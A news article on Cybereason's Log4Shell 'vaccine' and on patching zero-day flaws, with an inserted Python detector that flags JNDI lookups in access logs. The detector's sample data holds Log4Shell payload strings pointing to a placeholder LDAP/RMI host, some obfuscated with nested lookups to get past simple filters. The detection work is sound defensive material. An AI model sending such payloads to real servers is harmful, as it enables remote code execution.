Cybereason has created what it described as a “vaccine” for the Apache Log4Shell vulnerability (CVE-2021-44228) that is roiling organizations that rely on the open source Log4j logging framework to manage Java applications.
The Log4j framework is used by almost every Java application, which means the time and effort required to patch every instance can be significant. In the meantime, cybercriminals are already looking to exploit a remote code execution (RCE) vulnerability in the framework.
The vulnerability allows cybercriminals to take control of any Java-based, internet-facing server and execute code remotely on it, using a plug-in capability that was originally designed to make it easier to extend the logging platform. In recent releases of Log4j, that capability is turned on by default. An attacker can exploit the vulnerability by sending a crafted string that is logged by Log4j. At that point, the exploit allows the attacker to load arbitrary Java code and take control of the server. The vaccine Cybereason made available free of charge on GitHub makes use of the vulnerability itself to set a flag that turns off the plug-in capability once the vulnerable instance is detected.
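The "crafted string" described above is a Log4j lookup expression carried in attacker-controlled input that the application later logs (a request header, for instance). As an added example that is not part of the article or of Cybereason's tool, the following Python detector scans constructed access-log lines for the JNDI lookup syntax, first collapsing the nested lower/upper/default-value lookups that let such strings slip past a plain substring match; the host names and log lines are constructed placeholders.

```python
import re

# Log4j 2 lookup forms that are commonly nested to hide the literal text "jndi".
# Innermost lookups are resolved first, mirroring how Log4j evaluates them.
_LOWER_UPPER = re.compile(r"\$\{(lower|upper):([^${}]*)\}", re.IGNORECASE)
# ${name:-default} yields "default" when "name" is undefined, so ${::-j} yields "j".
_DEFAULT_VALUE = re.compile(r"\$\{[^${}]*:-([^${}]*)\}")
# The lookup that actually triggers the remote class load.
_JNDI = re.compile(r"\$\{\s*jndi:", re.IGNORECASE)


def normalize_lookups(text: str, max_rounds: int = 20) -> str:
    """Collapse nested lower/upper/default-value lookups until the text is stable."""
    for _ in range(max_rounds):
        new = _LOWER_UPPER.sub(
            lambda m: m.group(2).lower() if m.group(1).lower() == "lower" else m.group(2).upper(),
            text,
        )
        new = _DEFAULT_VALUE.sub(lambda m: m.group(1), new)
        if new == text:
            break
        text = new
    return text


def contains_jndi_lookup(line: str) -> bool:
    """True if the line carries a JNDI lookup, written plainly or behind nested lookups."""
    return bool(_JNDI.search(normalize_lookups(line)))


def flag_suspicious(lines):
    """Return the indices of log lines that a SOC analyst should triage."""
    return [i for i, line in enumerate(lines) if contains_jndi_lookup(line)]


# Constructed sample access-log lines (not captured traffic); hosts are placeholders.
SAMPLE_ACCESS_LOG = [
    '10.0.0.5 - - "GET /index.html HTTP/1.1" 200 "Mozilla/5.0"',
    '10.0.0.6 - - "GET / HTTP/1.1" 200 "${jndi:ldap://placeholder.example/a}"',
    '10.0.0.7 - - "GET / HTTP/1.1" 200 "${${lower:j}ndi:ldap://placeholder.example/b}"',
    '10.0.0.8 - - "GET / HTTP/1.1" 200 "${${::-j}${::-n}di:rmi://placeholder.example/c}"',
    '10.0.0.9 - - "GET /?q=${date:yyyy} HTTP/1.1" 200 "curl/7.0"',
]

if __name__ == "__main__":
    for idx in flag_suspicious(SAMPLE_ACCESS_LOG):
        print(f"line {idx}: {SAMPLE_ACCESS_LOG[idx]}")
```

The benign `${date:yyyy}` lookup on the last line is not flagged, which keeps the rule focused on the JNDI lookup rather than on every `${` in a log.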
Cybereason CTO Yonatan Striem-Amit said it’s generally simpler to download a vaccine that changes the vulnerable server’s configuration. That approach is not intended to eliminate the need to patch Log4j but, rather, to buy organizations’ enterprise IT teams more time to patch every instance of the framework they have running, he said. The vaccine requires only basic Java skills to implement, he noted. Alternatively, an IT team can permanently close the vulnerability by saving a configuration file to each server.
It’s not clear to what degree this vulnerability may have already been exploited, but this latest in a series of zero-day vulnerabilities is already taking a toll on IT teams large and small. Those IT teams should also expect that the rate at which zero-day vulnerabilities are disclosed will increase as more cybersecurity research is conducted. The issue cybersecurity teams now need to come to terms with is setting up a process that enables them to consistently remediate zero-day vulnerabilities with as little disruption as possible.
In fact, cybersecurity teams would be well-advised to crib some of the best practices that have been defined for modern IT incident management platforms to minimize the level of disruption created by the need to suddenly apply a patch. Based on processes that are rooted in the workflows DevOps teams have created to automate application deployment, a modern incident management platform enables IT teams to essentially expect the unexpected and quickly and effectively respond to it.
As IT teams become accustomed to responding to sudden events, the process will become more routine. That routine not only makes the organization more resilient in the face of a zero-day vulnerability, it also serves to reduce the overall stress of the IT team. This is critical at a time when burnout rates are contributing to higher rates of staff turnover, especially as most organizations are already chronically understaffed.
By Security Boulevard